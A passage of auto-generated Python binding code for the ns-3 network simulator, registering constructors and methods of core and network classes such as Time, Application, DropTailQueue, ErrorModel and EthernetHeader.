cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Application_methods(root_module, cls):
## application.h (module 'network'): ns3::Application::Application(ns3::Application const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Application const &', 'arg0')])
## application.h (module 'network'): ns3::Application::Application() [constructor]
cls.add_constructor([])
## application.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Application::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True)
## application.h (module 'network'): static ns3::TypeId ns3::Application::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## application.h (module 'network'): void ns3::Application::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## application.h (module 'network'): void ns3::Application::SetStartTime(ns3::Time start) [member function]
cls.add_method('SetStartTime',
'void',
[param('ns3::Time', 'start')])
## application.h (module 'network'): void ns3::Application::SetStopTime(ns3::Time stop) [member function]
cls.add_method('SetStopTime',
'void',
[param('ns3::Time', 'stop')])
## application.h (module 'network'): void ns3::Application::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StartApplication() [member function]
cls.add_method('StartApplication',
'void',
[],
visibility='private', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StopApplication() [member function]
cls.add_method('StopApplication',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3BooleanChecker_methods(root_module, cls):
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker(ns3::BooleanChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanChecker const &', 'arg0')])
return
def register_Ns3BooleanValue_methods(root_module, cls):
cls.add_output_stream_operator()
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(ns3::BooleanValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanValue const &', 'arg0')])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(bool value) [constructor]
cls.add_constructor([param('bool', 'value')])
## boolean.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::BooleanValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::Get() const [member function]
cls.add_method('Get',
'bool',
[],
is_const=True)
## boolean.h (module 'core'): std::string ns3::BooleanValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): void ns3::BooleanValue::Set(bool value) [member function]
cls.add_method('Set',
'void',
[param('bool', 'value')])
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3Channel_methods(root_module, cls):
## channel.h (module 'network'): ns3::Channel::Channel(ns3::Channel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Channel const &', 'arg0')])
## channel.h (module 'network'): ns3::Channel::Channel() [constructor]
cls.add_constructor([])
## channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Channel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): static ns3::TypeId ns3::Channel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3DataRateChecker_methods(root_module, cls):
## data-rate.h (module 'network'): ns3::DataRateChecker::DataRateChecker() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRateChecker::DataRateChecker(ns3::DataRateChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRateChecker const &', 'arg0')])
return
def register_Ns3DataRateValue_methods(root_module, cls):
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue(ns3::DataRateValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRateValue const &', 'arg0')])
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue(ns3::DataRate const & value) [constructor]
cls.add_constructor([param('ns3::DataRate const &', 'value')])
## data-rate.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::DataRateValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## data-rate.h (module 'network'): bool ns3::DataRateValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## data-rate.h (module 'network'): ns3::DataRate ns3::DataRateValue::Get() const [member function]
cls.add_method('Get',
'ns3::DataRate',
[],
is_const=True)
## data-rate.h (module 'network'): std::string ns3::DataRateValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## data-rate.h (module 'network'): void ns3::DataRateValue::Set(ns3::DataRate const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::DataRate const &', 'value')])
return
def register_Ns3DropTailQueue_methods(root_module, cls):
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue::DropTailQueue(ns3::DropTailQueue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DropTailQueue const &', 'arg0')])
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue::DropTailQueue() [constructor]
cls.add_constructor([])
## drop-tail-queue.h (module 'network'): ns3::Queue::QueueMode ns3::DropTailQueue::GetMode() [member function]
cls.add_method('GetMode',
'ns3::Queue::QueueMode',
[])
## drop-tail-queue.h (module 'network'): static ns3::TypeId ns3::DropTailQueue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## drop-tail-queue.h (module 'network'): void ns3::DropTailQueue::SetMode(ns3::Queue::QueueMode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::Queue::QueueMode', 'mode')])
## drop-tail-queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::DropTailQueue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
visibility='private', is_virtual=True)
## drop-tail-queue.h (module 'network'): bool ns3::DropTailQueue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## drop-tail-queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::DropTailQueue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ErrorModel::ErrorModel(ns3::ErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ErrorModel::ErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): void ns3::ErrorModel::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## error-model.h (module 'network'): void ns3::ErrorModel::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## error-model.h (module 'network'): static ns3::TypeId ns3::ErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): bool ns3::ErrorModel::IsCorrupt(ns3::Ptr<ns3::Packet> pkt) [member function]
cls.add_method('IsCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt')])
## error-model.h (module 'network'): bool ns3::ErrorModel::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## error-model.h (module 'network'): void ns3::ErrorModel::Reset() [member function]
cls.add_method('Reset',
'void',
[])
## error-model.h (module 'network'): bool ns3::ErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> arg0) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'arg0')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3EthernetHeader_methods(root_module, cls):
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader(ns3::EthernetHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EthernetHeader const &', 'arg0')])
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader(bool hasPreamble) [constructor]
cls.add_constructor([param('bool', 'hasPreamble')])
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader() [constructor]
cls.add_constructor([])
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## ethernet-header.h (module 'network'): ns3::Mac48Address ns3::EthernetHeader::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Mac48Address',
[],
is_const=True)
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::GetHeaderSize() const [member function]
cls.add_method('GetHeaderSize',
'uint32_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): ns3::TypeId ns3::EthernetHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): uint16_t ns3::EthernetHeader::GetLengthType() const [member function]
cls.add_method('GetLengthType',
'uint16_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): ns3::ethernet_header_t ns3::EthernetHeader::GetPacketType() const [member function]
cls.add_method('GetPacketType',
'ns3::ethernet_header_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): uint64_t ns3::EthernetHeader::GetPreambleSfd() const [member function]
cls.add_method('GetPreambleSfd',
'uint64_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): ns3::Mac48Address ns3::EthernetHeader::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Mac48Address',
[],
is_const=True)
## ethernet-header.h (module 'network'): static ns3::TypeId ns3::EthernetHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetDestination(ns3::Mac48Address destination) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Mac48Address', 'destination')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetLengthType(uint16_t size) [member function]
cls.add_method('SetLengthType',
'void',
[param('uint16_t', 'size')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetPreambleSfd(uint64_t preambleSfd) [member function]
cls.add_method('SetPreambleSfd',
'void',
